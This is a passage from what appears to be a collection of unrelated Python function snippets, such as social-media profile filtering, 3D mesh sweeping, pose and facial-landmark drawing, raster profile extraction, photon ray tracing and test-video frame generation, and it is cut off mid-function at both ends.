profile.description for kw in settings.include_keywords.splitlines()):\n print(\"NO KEYWORDS\")\n return False\n\n if profile.followers_count is None:\n return False\n \n if profile.followers_count < settings.followers:\n print(\"NUM FOLLOWERS\")\n return False\n\n if any(loc in profile.location for loc in settings.fromcountries.splitlines()):\n print(\"LOCATION\")\n return False\n\n if profile.statuses_count < settings.tweets:\n print(\"NUM TWEETS\")\n return False\n\n created = datetime.datetime.strptime(profile.created_at, \"%a %b %d %H:%M:%S %z %Y\")\n months = relativedelta(datetime.datetime.now(datetime.timezone.utc), created).years * 12\n if months == 0:\n if (profile.statuses_count / 12) > settings.tweetsperyear:\n print(\"TWEETS PER YEAR\")\n return False\n else:\n if (profile.statuses_count / months / 12) > settings.tweetsperyear:\n print(\"TWEETS PER YEAR\")\n return False\n\n if profile.status is not None:\n lasttweetdate = datetime.datetime.strptime(profile.status.created_at, \"%a %b %d %H:%M:%S %z %Y\").replace(tzinfo=None)\n \n lasttweetmonths = relativedelta(datetime.datetime.now(), lasttweetdate).years * 12\n if lasttweetmonths > settings.notweetsfor:\n print(\"LAST TWEET\")\n return False\n else:\n return False\n # else\n return True", "def addProfile(self, profile, color=None, close=False):\n if close:\n e1 = profile[0] # should always be a point\n if e1[0] != 0.0:\n profile = [(0.0, e1[1])] + profile\n e2 = profile[-1]\n if e2[0] != 0.0:\n if len(e2) == 2:\n profile.append((0.0, e2[1]))\n else:\n # profile ends in an arc\n profile.append((0.0, e2[0][1]))\n # previous line start x/y, for line -> arc\n px1 = py1 = None\n for e1, e2 in windowItr(profile, 2, 1):\n if e2 is None:\n break\n le1 = len(e1)\n le2 = len(e2)\n # line or start -> line\n if le1 == 2 and le2 == 2:\n x1, y1 = e1\n x2, y2 = e2\n self.blendTangent(False)\n patch = Patch.fromRevLineSeg(x1, y1, x2, y2, self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n px1 = x1\n py1 = y1\n # line or start -> arc\n elif le1 == 2 and le2 == 3:\n x1, y1 = e1\n (x2, y2), (cx, cy), d = e2\n if px1 is not None:\n self.blendTangent(self._isLineTanToArc(px1, py1, x1, y1,\n cx, cy, d))\n patch = Patch.fromRevArcSeg(x1, y1, x2, y2, cx, cy, d, self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n # arc -> line\n elif le1 == 3 and le2 == 2:\n (aex, aey), (cx, cy), d = e1\n lex, ley = e2\n self.blendTangent(self._isLineTanToArc(lex, ley, aex, aey, cx,\n cy, d))\n patch = Patch.fromRevLineSeg(aex, aey, lex, ley, self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n px1 = aex\n py1 = aey\n # arc -> arc\n else:\n (x1, y1), (cx1, cy1), d1 = e1\n (x2, y2), (cx2, cy2), d2 = e2\n self.blendTangent(self._isArcTangentToArc(x1, y1, cx1, cy1,\n cx2, cy2))\n patch = Patch.fromRevArcSeg(x1, y1, x2, y2, cx2, cy2, d2,\n self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n self._bbox = BBox.fromVertices(self._sharedVertices)", "def profile(x):\n return x", "def __init__(self, profile: prof.Profile) -> None:\n logger.debug('merge filter initialize')\n self._profile = profile", "def profile(self, profile):\n\n self.width = profile['width']\n self.height = profile['height']\n self.crs = profile['crs']\n self.interleave = profile['interleave']\n self.resampling = profile['resampling']", "def draw(img, p):\n\t\t\n\t########### First of all we gotta define which point connects together, there are points for the head(5), the shoulders, elbows, hands, top of thighs, knees, feet\n\t########### top of thighs, knees and feet. We also gonna add 2 extra points for the neck and the pelvis, to make everythonh look better.\n\t########### We also provide the color of each line here\n\tconnexions = [\t\n\t\t\t\t\t(5, 7, 'navy'),\t\t# shoulder => elbow\n\t\t\t\t\t(7, 9, 'navy'),\t\t# elbow => hand\n\t\t\t\t\t(6, 8, 'navy'),\t\t# same on the other side\n\t\t\t\t\t(8, 10, 'navy'),\n\t\t\t\t\t(11, 13, 'lime'),\t# thigh => knee\n\t\t\t\t\t(13, 15, 'lime'),\t# knee => foot\n\t\t\t\t\t(12, 14, 'lime'),\t# same on the other side\n\t\t\t\t\t(14, 16, 'lime'),\n\n\t\t\t\t\t###### With The Extra points :\n\n\t\t\t\t\t(0, 17, 'aqua'),\t# head => neck\n\t\t\t\t\t(17, 5, 'aqua'),\t# neck => shoulders\n\t\t\t\t\t(17, 6, 'aqua'),\n\t\t\t\t\t(17, 18, 'teal'),\t# neck => pelvis\n\t\t\t\t\t(18, 11, 'teal'),\t# pelvis => thighs\n\t\t\t\t\t(18, 12, 'teal')\n\t\t\t\t\t]\n\n\t###### now let's find out how many objects were detected \n\t\n\tl = len(p[0][\"scores\"])\n\n\t##### time to draw now, we'll only select objects with a score over .9\n\n\td = idw.Draw(img)\n\n\tfor k in range(l):\n\n\t\tif p[0][\"scores\"][k] > 0.98:\n\n\t\t\t##### Let's add the neck and pelvis:\n\t\t\tneck = (p[0][\"keypoints\"][k][5] + p[0][\"keypoints\"][k][6])/2\n\t\t\tpelv = (p[0][\"keypoints\"][k][11] + p[0][\"keypoints\"][k][12])/2\n\n\t\t\t#### it's getting tricky here\n\n\t\t\tnepe = t.zeros((2, 3))\n\t\t\tnepe[0] = neck ; nepe[1] = pelv \n\n\t\t\t### Now let's put everything into a single tensor\n\t\t\tbody = t.cat((p[0][\"keypoints\"][k], nepe))\n\n\t\t\t#### We can start drawing now, for real\n\n\t\t\tfor tp in connexions:\n\n\t\t\t\tp0 = (int(body[tp[0], 0]), int(body[tp[0], 1]))\n\t\t\t\tp1 = (int(body[tp[1], 0]), int(body[tp[1], 1]))\n\t\t\t\td.line([p0, p1], fill=tp[2], width=2)\n\n\t\t\t#### Now the points\n\n\t\t\tfor ts in t.cat((body[0:1], body[5:])):\n\t\t\t\td.ellipse((int(ts[0]-2), int(ts[1]-2), int(ts[0]+2), int(ts[1]+2)), 'fuchsia')\n\n\t### and finally\n\t#plt.imshow(np.asarray(img)) Not Like That\n\timg.show()", "def sweep(profile,n,capped=False):\n assert n > 2 and isinstance(n,int)\n profile = openPoly(profile)\n t = yRot(360/n)\n result = Mesh()\n\n if capped:\n first = profile[0]\n firstOnY = [0,first[1],0]\n if not near(first,firstOnY):\n print(\"adding bottom cap\")\n cap = []\n for i in range(n):\n cap.append(first)\n first = t(first)\n result.addPoly(cap)\n\n last = profile[-1]\n lastOnY = [0,last[1],0]\n if not near(last,lastOnY):\n print(\"adding top cap.\")\n cap = []\n for i in range(n):\n cap.append(last)\n last = t(last)\n result.addPoly(cap[::-1])\n\n for i in range(n):\n newProfile = t(profile)\n for ((p0,p1),(q0,q1)) in zip(edges(profile),edges(newProfile)):\n if near(p0,q0): # when p0 near y axis\n if not near(p1,q1):\n result.addTri([p0,p1,q1])\n elif near(p1,q1): # when p1 near y axis\n result.addTri([p0,p1,q0])\n else:\n result.addTri([p0,p1,q0])\n result.addTri([p1,q1,q0])\n profile = newProfile\n return result", "def draw_points(self, pic_path, points_data):\n # Pupil Finding here\n pupils = get_eye_locations_in_image(pic_path)\n img = cv2.imread(pic_path)\n frame_number = int(re.findall(r'\\d+', pic_path.split('/')[-1])[0])\n dets = detector(img)\n shape = None\n height, width, channels = img.shape\n\n for k, d in enumerate(dets):\n shape = predictor(img, d)\n\n if(not shape):\n return\n\n pointList = []\n c = 0\n for b in range(68):\n # sanitizing input points\n point = Point(shape.part(b).x, shape.part(b).y)\n points_data[c] = [point.x, point.y]\n c = c + 1\n # some points might be out of bound\n # so, move them to the closest boundary\n if(point.x < 0):\n point.x = 0\n elif(point.x >= width):\n point.x = width - 1\n if(point.y < 0):\n point.y = 0\n elif(point.y >= height):\n point.y = height - 1\n\n pointList.append(point)\n\n roll = findRoll(pointList)\n #print(\"roll is \" + str(roll) + ' angles')\n yaw = findYaw(pointList)\n #print(\"yaw is \" + str(yaw) + ' angles')\n pitch = findPitch(pointList)\n #print(\"pitch is \" + str(pitch) + ' angles')\n self.data[frame_number] = [roll, yaw, pitch]\n counter = 0\n for point in pointList:\n cv2.circle(img, (point.x, point.y), ImageProcessor.POINT_SIZE, ImageProcessor.POINT_COLOR, -1)\n counter = counter + 1\n\n self.draw_triangles(img, pointList)\n \n for pupil in pupils:\n cv2.circle(img, (pupil.left.x, pupil.left.y), 5, (0,0,255), -1)\n cv2.circle(img, (pupil.right.x, pupil.right.y), 5, (0,0,255), -1)\n points_data[-1] = [pupil.left.x, pupil.left.y]\n points_data[-2] = [pupil.right.x, pupil.right.y]\n #print(pupil.left.x, \", \", pupil.left.y)\n #print(pupil.right.x, \", \", pupil.right.y)\n\n cv2.imwrite(pic_path, img)", "def extract_profile(tif, line_file, ds):\r\n\r\n import numpy as np\r\n import gdal\r\n import fiona\r\n from scipy.interpolate import interp1d\r\n# from scipy.interpolate import interp2d\r\n from scipy.ndimage import map_coordinates\r\n \r\n #%% Create evenly spaced points\r\n # Read coordinates of the profile line from shapefile\r\n fiona_obj = fiona.open(line_file)\r\n# line = fiona_obj.next()\r\n line = iter(fiona_obj).next() # this line is proper syntax for fiona v2. Corrected on Mar 12, 2021 by TCB\r\n coords = np.array( line['geometry']['coordinates'] ) # m the easting and northing coordinates of the vertices along the shapefile\r\n \r\n sqrd_deltas = np.diff(coords, axis=0)**2 # squared differences between x and y coordinates\r\n deltas = np.sum(sqrd_deltas, axis=1)**0.5 # m straight-line path length between adjacent points in the shapefile\r\n dist = np.cumsum( np.append(0, deltas) ) # m running distance along the shapefile from one end.\r\n \r\n disti = np.arange(dist[0], dist[-1], ds) # m vector of evenly spaced distances along the shapefile,\r\n # equivalent to an evenly spaced version of dist\r\n xi = interp1d(dist, coords[:,0])(disti) # m the easting coordinates of disti points, at which profile will be extracted\r\n yi = interp1d(dist, coords[:,1])(disti) # m the northing coordinates of disti points, at which profile will be extracted\r\n\r\n #%% Manipulate the raster and extract its data\r\n # ---- dimensions of geotiff\r\n gtif = gdal.Open(tif)\r\n xmin,xres,xskew,ymax,yskew,yres = gtif.GetGeoTransform()\r\n\r\n\r\n # convert the profile coordinates into pixel coordinates\r\n px = (xi - xmin) / xres\r\n py = (yi - ymax) / yres\r\n# px = np.round(col).astype(int)\r\n# py = np.round(row).astype(int)\r\n \r\n \r\n # pull out the array of raster data. Data are assumed to be in band 1.\r\n gtif_data = gtif.GetRasterBand(1).ReadAsArray()\r\n# gtif_data = band.ReadAsArray()px,py, 1, 1)\r\n \r\n # Two early versions of extacting the data:\r\n # profile = map_coordinates(gtif_data,[px,py],order=0,cval=np.nan)\r\n # profile = interp2d(np.arange(gtif_data.shape[1]), np.arange(gtif_data.shape[0]), \r\n # gtif_data)(px, py)\r\n\r\n # Interpolate within gtif_data at given pixel coordinates to identify values from the geotiff \r\n # Uses a 1st order spline interpolant to extract estimated values of\r\n # gtif_data at the (non-integer) pixel values px and py.\r\n # Function returns `cval' at undefined values of gtif_data.\r\n profile = map_coordinates(gtif_data, np.vstack((py, px)),\r\n order=1, cval=np.nan)\r\n \r\n# profile = np.array(profile,dtype=float)\r\n if type(profile[0]) == float:\r\n profile[np.abs(profile) == 9999] = np.nan\r\n \r\n return disti, profile", "def start_if_active(self,\n profile_id=None):\n profiler = None\n\n if self._active(profile_id):\n # Enable the profiler\n profiler = cProfile.Profile()\n profiler.enable()\n\n return profiler", "def _analyze(self, original_frame, landmarks, side, calibration):\n if side == 0:\n points = self.LEFT_EYE_POINTS\n elif side == 1:\n points = self.RIGHT_EYE_POINTS\n else:\n return\n self.blinking = self._blinking_ratio(landmarks, points)\n self._isolate(original_frame, landmarks, points)\n if not calibration.is_complete():\n calibration.evaluate(self.frame, side)\n threshold = calibration.threshold(side)\n self.pupil = Pupil(self.frame, threshold)", "def trace(self):\n\n \n assert self.scene != None, \"The photon's scene variable is not set.\"\n \n intersection_points, intersection_objects = self.scene.intersection(self.ray)\n\n \"\"\"\n #DIAGNOSTICS\n print \"\\nnew\\n\"\n print self.position, self.direction, \"\\n\"\n print intersection_points, \"\\n\"\n for i in range(0, len(intersection_objects)):\n print \"Object: \", intersection_objects[i].name, \" - Intersection: \", intersection_points[i]\n \"\"\"\n \n assert intersection_points != None, \"The ray must intersect with something in the scene to be traced.\"\n \n if self.container is None:\n self.container = self.scene.container(self)\n assert self.container != None, \"Container of ray cannot be found.\"\n \n #import pdb; pdb.set_trace()\n #import pudb; pudb.set_trace()\n intersection_points, intersection_objects = Scene.sort(intersection_points, intersection_objects, self, container=self.container, show_log=self.show_log)\n \n # find current intersection point and object -- should be zero if the list is sorted!\n intersection = closest_point(self.position, intersection_points)\n for i in range(0,len(intersection_points)):\n if list(intersection_points[i]) == list(intersection):\n index = i\n break\n \n #import pdb; pdb.set_trace()\n intersection_object = intersection_objects[index]\n assert intersection_object != None, \"No intersection points can be found with the scene.\"\n \n \n \"\"\"\n #DIAGNOSTICS\n print \"\\n\", intersection, \"\\n\"\n print intersection_object.name \n \"\"\" \n \n \n # Reached scene boundaries?\n if intersection_object is self.scene.bounds:\n self.active = False\n self.previous_container = self.container\n self.container = self.scene.bounds\n return self\n\n\n # Reached a RayBin (kind of perfect absorber)?\n if isinstance(intersection_object, RayBin):\n self.active = False\n self.previous_container = self.container\n self.container = self.scene.bounds\n return self\n \n \n # Here we trace the ray through a Coating\n if isinstance(self.container, Coating):\n normal = intersection_object.shape.surface_normal(self.ray)\n self = self.container.material.trace(self, normal, separation(self.position, intersection))\n self.exit_device = self.container\n self.previous_container = self.container\n self.container = self.scene.container(self)\n return self\n \n \n # Here we determine if the Coating has been hit\n if isinstance(intersection_object, Coating) and intersection_object.shape.on_surface(self.position):\n self.previous_container = self.container\n self.container = intersection_object\n self.exit_device = intersection_object\n assert self.exit_device != self.scene.bounds, \"The object the ray hit before hitting the bounds is the bounds, this can't be right.\"\n return self\n \n \n # Here we trace the ray through a Material\n self = self.container.material.trace(self, separation(self.position, intersection))\n \n \n # Lost in material?\n # Photon has been re-absorbed but NOT re-emitted, i.e. is inactive\n if not self.active:\n #01/04/10: Unification --> Next two lines came from older Trace version\n self.exit_device = self.container\n self.exit_material = self.container.material\n return self \n \n # Reaches interface\n # Photon has been re-absorbed AND re-emitted, i.e. is still active\n ray_on_surface = intersection_object.shape.on_surface(self.position)\n if not ray_on_surface: \n self.exit_device = self.container\n return self\n \n # Ray has reached a surface of some description, increment the intersection counter\n self.intersection_counter += 1\n \n # If we reach an reflective material then we don't need to follow \n # this logic we can just return\n if ray_on_surface and isinstance(intersection_object, Coating):\n self.previous_container = self.container\n self.container = intersection_object\n self.exit_device = intersection_object\n return self\n \n # KARLG NEW CODE HERE\n #import pudb; pudb.set_trace()\n if isinstance(intersection_object, Face):\n self.exit_device = intersection_object\n \n # Now change the properties of the photon accoring to what your surface does\n random_number = np.random.random_sample()\n if random_number < intersection_object.reflectivity:\n # Reflected\n self.direction = reflect_vector(intersection_object.shape.surface_normal(self.ray), self.direction)\n elif random_number < intersection_object.reflectivity + intersection_object.transmittance:\n # Transmitted\n pass\n else:\n # Loss\n self.active = False\n return self\n \n # Fresnel details\n normal = intersection_object.shape.surface_normal(self.ray)\n rads = angle(normal, self.direction)\n \n # material-air or material-material interface\n # Are there duplicates intersection_points that are equal to the ray position?\n same_pt_indices = []\n for i in range(0,len(intersection_points)):\n if cmp_points(self.position, intersection_points[i]):\n same_pt_indices.append(i)\n assert len(same_pt_indices) < 3, \"An interface can only have 2 or 0 common intersection points.\"\n \n initialised_internally = None\n \n if len(same_pt_indices) == 2:\n intersection_object = self.container\n \n if self.container == intersection_object:\n \n # hitting internal interface -- for the case we are at an material-material interface (i.e. not travelling through air)\n initialised_internally = True\n \n if len(same_pt_indices) == 2:\n \n for obj in intersection_objects:\n if obj.shape.on_surface(intersection) and obj != self.container:\n #if obj != self.container:\n next_containing_object = obj\n \n \n else:\n # hitting internal interface -- for the case we are not at an interface\n next_containing_object = self.scene.container(self)\n \n assert self.container != next_containing_object, \"The current container cannot also be the next containing object after the ray is propagated.\"\n \n # Fresnel details\n normal = intersection_object.shape.surface_normal(self.ray)\n rads = angle(normal, self.direction)\n if self.polarisation == None:\n reflection = fresnel_reflection(rads, self.container.material.refractive_index, next_containing_object.material.refractive_index)\n else:\n reflection = fresnel_reflection_with_polarisation(normal, self.direction, self.polarisation, self.container.material.refractive_index, next_containing_object.material.refractive_index)\n \n else:\n # hitting external interface\n initialised_internally = False \n \n \n if len(same_pt_indices) == 2:\n for obj in intersection_objects:\n if obj != self.container:\n intersection_object = obj\n next_containing_object = obj\n else:\n next_containing_object = intersection_object\n \n #import pdb; pdb.set_trace()\n normal = intersection_object.shape.surface_normal(self.ray)\n rads = angle(normal, self.direction)\n if self.polarisation == None:\n reflection = fresnel_reflection(rads, self.container.material.refractive_index, next_containing_object.material.refractive_index)\n else:\n reflection = fresnel_reflection_with_polarisation(normal, self.direction, self.polarisation, self.container.material.refractive_index, next_containing_object.material.refractive_index)\n \n if isinstance(next_containing_object, Collector):\n # If the photon hits an interface with e.g. a cell index-matched to it, then no reflection is to occur at this interface.\n reflection = 0.\n \n if np.random.random_sample() < reflection:\n # photon is reflected\n before = copy(self.direction)\n self.direction = reflect_vector(normal, self.direction)\n ang = angle(before, self.direction)\n \n if self.polarisation != None:\n \n #import pdb; pdb.set_trace()\n if cmp_floats(ang, np.pi):\n # Anti-parallel\n self.polarisation = self.polarisation\n else:\n # apply the rotation transformation the photon polarisation which aligns the before and after directions\n R = rotation_matrix_from_vector_alignment(before, self.direction)\n self.polarisation = transform_direction(self.polarisation, R)\n \n assert cmp_floats(angle(self.direction, self.polarisation), np.pi/2), \"Exit Pt. #1: Angle between photon direction and polarisation must be 90 degrees: theta=%s\" % str(np.degrees(angle(self.direction, self.polarisation)))\n \n self.propagate = False\n self.exit_device = self.container\n \n # invert polaristaion if n1 < n2\n if self.container.material.refractive_index < next_containing_object.material.refractive_index:\n \n if self.polarisation != None:\n \n if cmp_floats(ang, np.pi):\n # Anti-parallel\n self.polarisation = self.polarisation * -1.\n else:\n # apply the rotation transformation the photon polarisation which aligns the before and after directions\n R = rotation_matrix_from_vector_alignment(before, self.direction)\n self.polarisation = transform_direction(self.polarisation, R)\n \n assert cmp_floats(angle(self.direction, self.polarisation), np.pi/2), \"Exit Pt. #2: Angle between photon direction and polarisation must be 90 degrees: theta=%s\" % str(angle(self.direction, self.polarisation))\n \n if self.exit_device == self.scene.bounds or self.exit_device == None:\n self.exit_device = intersection_object\n assert self.exit_device != self.scene.bounds, \"The object the ray hit before hitting the bounds is the bounds, this can't be right\"\n return self\n else:\n # photon is refracted through interface\n self.propagate = True\n before = copy(self.direction)\n ang = angle(before, self.direction)\n if initialised_internally:\n if not isinstance(next_containing_object, Collector):\n self.direction = fresnel_refraction(normal, self.direction, self.container.material.refractive_index, next_containing_object.material.refractive_index )\n \n if self.polarisation != None:\n if cmp_floats(ang, np.pi):\n # Anti-parallel\n self.polarisation = self.polarisation\n else:\n # apply the rotation transformation the photon polarisation which aligns the before and after directions\n R = rotation_matrix_from_vector_alignment(before, self.direction)\n self.polarisation = transform_direction(self.polarisation, R)\n assert cmp_floats(angle(self.direction, self.polarisation), np.pi/2), \"Exit Pt. #3: Angle between photon direction and polarisation must be 90 degrees: theta=%s\" % str(angle(self.direction, self.polarisation))\n \n self.exit_device = self.container #LSC is the exit_device\n self.previous_container = self.container\n self.container = next_containing_object #Bounds is the container\n return self\n else:\n if not isinstance(next_containing_object, Collector):\n self.direction = fresnel_refraction(normal, self.direction, self.container.material.refractive_index, intersection_object.material.refractive_index )\n \n if self.polarisation != None:\n \n if cmp_floats(ang, np.pi):\n # Anti-parallel\n self.polarisation = self.polarisation\n else:\n # apply the rotation transformation the photon polarisation which aligns the before and after directions\n R = rotation_matrix_from_vector_alignment(before, self.direction)\n self.polarisation = transform_direction(self.polarisation, R)\n # apply the rotation transformation the photon polarisation which aligns the before and after directions\n\n assert cmp_floats(angle(self.direction, self.polarisation), np.pi/2), \"Exit Pt. #4: Angle between photon direction and polarisation must be 90 degrees: theta=%s\" % str(angle(self.direction, self.polarisation))\n \n # DJF 13.5.2010: This was crashing the statisical collection because it meant that an incident ray, hitting and transmitted, then lost would have bounds as the exit_device.\n #self.exit_device = self.container\n self.exit_device = intersection_object\n self.previous_container = self.container\n self.container = intersection_object\n return self", "def sumPoints(popSize, population, x):\n skipCount = 0\n for num in range(popSize):\n passParam = 0\n # print \"pre-skip check; skip count is: \", skipCount\n if skipCount != 0:\n skipCount -= 1\n # print \"skip detected\"\n continue\n if num > 0: # done this way because: if num = 0 population[num-1] will fail\n if x == \"avg\": # each category evaluates a different attribute of the team\n if population[num - 1].totAvg == population[num].totAvg:\n count, sentinel = 1, 1 # count is 1 because 1 data at that value has been detected already\n while sentinel == 1:\n if num + count <= popSize - 1:\n if population[num + count - 1].totAvg == population[num + count].totAvg:\n count += 1\n else:\n sentinel = 0\n else:\n sentinel = 0\n for i in range(\n count): # for every n number of duplicates, this action is performed n-1 times since duplicates are treated when the second one is detected\n population[num + i].points += popSize - num + 1\n # print \"points changed!\"\n # print num+i, population[num+i].points\n skipCount += count - 1\n # print \"num\",num\n passParam = 1\n elif x == \"sb\": # each category evaluates a different attribute of the team\n if population[num - 1].totSb == population[num].totSb:\n count, sentinel = 1, 1 # count is 1 because 1 data at that value has been detected already\n while sentinel == 1:\n if num + count <= popSize - 1:\n if population[num + count - 1].totSb == population[num + count].totSb:\n count += 1\n else:\n sentinel = 0\n else:\n sentinel = 0\n for i in range(\n count): # for every n number of duplicates, this action is performed n-1 times since duplicates are treated when the second one is detected\n population[num + i].points += popSize - num + 1\n # print \"points changed!\"\n # print num+i, population[num+i].points\n skipCount += count - 1\n # print \"num\",num\n passParam = 1\n elif x == \"hr\":\n if population[num - 1].totHr == population[num].totHr:\n count, sentinel = 1, 1 # count is 1 because 1 data at that value has been detected already\n while sentinel == 1:\n if num + count <= popSize - 1:\n if population[num + count - 1].totHr == population[num + count].totHr:\n count += 1\n else:\n sentinel = 0\n else:\n sentinel = 0\n for i in range(\n count): # for every n number of duplicates, this action is performed n-1 times since duplicates are treated when the second one is detected\n population[num + i].points += popSize - num + 1\n # print \"points changed!\"\n # print num+i, population[num+i].points\n skipCount += count - 1\n # print \"num\",num\n passParam = 1\n elif x == \"rbi\":\n if population[num - 1].totRbi == population[num].totRbi:\n count, sentinel = 1, 1 # count is 1 because 1 data at that value has been detected already\n while sentinel == 1:\n if num + count <= popSize - 1:\n if population[num + count - 1].totRbi == population[num + count].totRbi:\n count += 1\n else:\n sentinel = 0\n else:\n sentinel = 0\n for i in range(\n count): # for every n number of duplicates, this action is performed n-1 times since duplicates are treated when the second one is detected\n population[num + i].points += popSize - num + 1\n # print \"points changed!\"\n # print num+i, population[num+i].points\n skipCount += count - 1\n # print \"num\",num\n passParam = 1\n elif x == \"runs\":\n if population[num - 1].totRuns == population[num].totRuns:\n count, sentinel = 1, 1 # count is 1 because 1 data at that value has been detected already\n while sentinel == 1:\n if num + count <= popSize - 1:\n if population[num + count - 1].totRuns == population[num + count].totRuns:\n count += 1\n else:\n sentinel = 0\n else:\n sentinel = 0\n for i in range(\n count): # for every n number of duplicates, this action is performed n-1 times since duplicates are treated when the second one is detected\n population[num + i].points += popSize - num + 1\n # print \"points changed!\"\n # print num+i, population[num+i].points\n skipCount += count - 1\n # print \"num\",num\n passParam = 1\n if passParam == 0: # will only be 0 if no repeats are detected; alterative to putting an else statement in each category if clause\n population[num].points += popSize - num # in which case: business as usual\n # print \"more points yo\"\n else:\n population[num].points += popSize - num # business as usual\n # print \"getting them points\"\n # print num, population[num].points", "def should_profile():\n if util.dev_server:\n return _config.should_profile_development()\n else:\n return _config.should_profile_production()", "def __post_init__(self) -> None:\n self.annotate = self.x_y[0] == 0 or self.x_y[1] == 0", "def double_profile(tprofile_x, tprofile_y):\n ## Note: underflow and overflow bins are discarded\n\n if len(tprofile_x) != len(tprofile_y):\n raise ValueError(\"Cannot build double profile: x and y profiles \"\n \"have different number or bins ({} and {})\".format(\n len(tprofile_x)-2, len(tprofile_y)-2))\n\n _dp_graph = Graph(len(tprofile_x)-2, type='errors') # symmetric errors\n\n _i_point = 0\n for _i_bin, (_bin_proxy_x, _bin_proxy_y) in enumerate(zip(tprofile_x, tprofile_y)):\n # disregard overflow/underflow bins\n if _i_bin == 0 or _i_bin == len(tprofile_x) - 1:\n continue\n\n if _bin_proxy_y.value:\n _dp_graph.SetPoint(_i_point, _bin_proxy_x.value, _bin_proxy_y.value)\n _dp_graph.SetPointError(_i_point, _bin_proxy_x.error, _bin_proxy_y.error)\n _i_point += 1\n\n # remove \"unfilled\" points\n while (_dp_graph.GetN() > _i_point):\n _dp_graph.RemovePoint(_dp_graph.GetN()-1)\n\n return _dp_graph", "def make_lineprofile(npix,rstar,xc,vgrid,A,veq,linewidth):\n vc=(np.arange(npix)-xc)/rstar*veq\n vs=vgrid[np.newaxis,:]-vc[:,np.newaxis]\n profile=1.-A*np.exp( -(vs*vs)/2./linewidth**2)\n return profile", "def genFrameImages((widthPixels, heightPixels), flashColourGen, flashColourGenPipTrain, numFrames, FPS, superSamplingScale=8, BG_COLOUR=(0,0,0), TEXT_COLOUR=(255,255,255), GFX_COLOUR=(255,255,255), title=\"\", TITLE_COLOUR=(255,255,255), FRAMES_AS_FIELDS=False, frameSkipChecker=None, segments=[]):\n\n # we're going to draw a larger (super sampled) image and then scale it down\n # to get smoothing (compensating for the lack of anti-aliased drawing functions\n # in PIL)\n\n width = widthPixels * superSamplingScale\n height = heightPixels * superSamplingScale\n\n flashCols = list(flashColourGen)[0:numFrames]\n flashColsPipTrain = list(flashColourGenPipTrain)[0:numFrames]\n\n # we'll pretend we're working within a rectangle (0,0) - (160,90)\n # and use a scaling function to map to out actual dimensions\n scaler = AspectPreservingCoordinateScaler((160,90),(width,height))\n\n # load a font for text\n font = loadFont(sizePt = scaler.s(4))\n smallfont = loadFont(sizePt = scaler.s(4))\n \n # work out the segment description text, then check its size and adjust the fontsize to ensure it fits within bounding area\n if segments:\n segment_description_text = \"\\n\".join(map(lambda seg : seg[\"description\"], segments))\n tmpimg = Image.new(\"RGB\", (width, height), color=BG_COLOUR)\n tmpdraw = ImageDraw.Draw(tmpimg)\n w,h = tmpdraw.multiline_textsize(segment_description_text, font=smallfont)\n max_w, max_h = scaler.xy((140,13))\n \n shrink_factor = min(float(max_w) / w, float(max_h) / h, 1)\n smallfont = loadFont(sizePt = scaler.s(4*shrink_factor))\n \n poy = 0 # pie Y offset\n dfy = 65 # duration and FPS labels Y offset\n if segments:\n poy = -10\n dfy = 19\n\n\n\n WHITE=(255,255,255)\n BLACK=(0,0,0)\n\n if FRAMES_AS_FIELDS:\n imageName = \"field\"\n labelFps = FPS / 2\n else:\n imageName = \"frame\"\n labelFps = FPS\n\n\n for frameNum in range(0,numFrames):\n if frameSkipChecker is not None:\n shouldSkip=frameSkipChecker(frameNum)\n if shouldSkip:\n yield None\n continue\n\n timecode = frameNumToTimecode(frameNum, FPS, framesAreFields=FRAMES_AS_FIELDS)\n timeSecs = float(frameNum) / FPS\n nextTimeSecs = float(frameNum+1) / FPS # time of next frame after this\n durationTimecode = frameNumToTimecode(numFrames, FPS)\n\n # create black image and an object to let us draw on it\n img = Image.new(\"RGB\", (width, height), color=BG_COLOUR)\n draw = ImageDraw.Draw(img)\n\n # draw a flashing rectangular box on the left side\n flashColour = flashCols[frameNum]\n topLeft = scaler.xy((10, 30))\n bottomRight = scaler.xy((40, 60))\n draw.rectangle(topLeft + bottomRight, outline=None, fill=GFX_COLOUR)\n topLeft = scaler.xy((11, 31))\n bottomRight = scaler.xy((39, 59))\n draw.rectangle(topLeft + bottomRight, outline=None, fill=flashColour)\n\n # draw text label explaining to attach light sensor to the flashing box\n topLeft = scaler.xy((41, 37))\n draw.text(topLeft, \"Use light detector\", font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((41, 41))\n draw.text(topLeft, \"on centre of\", font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((41, 45))\n draw.text(topLeft, \"this box\", font=font, fill=TEXT_COLOUR)\n\n # draw text labels giving frame number, timecode and seconds covered by this frame\n topLeft = scaler.xy((10, 4))\n draw.text(topLeft, timecode, font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((10, 9))\n draw.text(topLeft, \"%06d of %d %ss\" % (frameNum, numFrames, imageName), font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((10, 14))\n draw.text(topLeft, u\"%08.3f \\u2264 t < %08.3f secs\" % (timeSecs, nextTimeSecs), font=font, fill=TEXT_COLOUR)\n\n topLeft = scaler.xy((10,dfy))\n draw.text(topLeft, \"Duration: \" + durationTimecode, font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((10,dfy+5))\n draw.text(topLeft, \"%d fps\" % labelFps, font=font, fill=TEXT_COLOUR)\n\n # and more text labels, but this time right justified\n text = title\n w,h = font.getsize(text)\n topLeft = scaler.xy((150,4))\n topLeft = topLeft[0] - w, topLeft[1]\n draw.text(topLeft, text, font=font, fill=TITLE_COLOUR)\n\n # draw an outer ring segment indicating the time period covered by the current frame\n topLeft = scaler.xy((105, 20+poy))\n bottomRight = scaler.xy((155, 70+poy))\n angle1 = 360 * (frameNum % FPS) / FPS\n angle2 = 360 * ((frameNum % FPS) + 1) / FPS\n draw.pieslice(topLeft + bottomRight, start=270+angle1, end=270+angle2, outline=None, fill=GFX_COLOUR)\n\n # hollow it out to make the circle into a ring\n topLeft = scaler.xy((108, 23+poy))\n bottomRight = scaler.xy((152, 67+poy))\n draw.ellipse(topLeft + bottomRight, outline=None, fill=BG_COLOUR)\n\n\n # draw frame num ring\n topLeft = scaler.xy((110, 25+poy))\n bottomRight = scaler.xy((150, 65+poy))\n angle = 360 * (frameNum % FPS) / FPS\n if (frameNum / FPS) % 2 == 0: # if this is an even 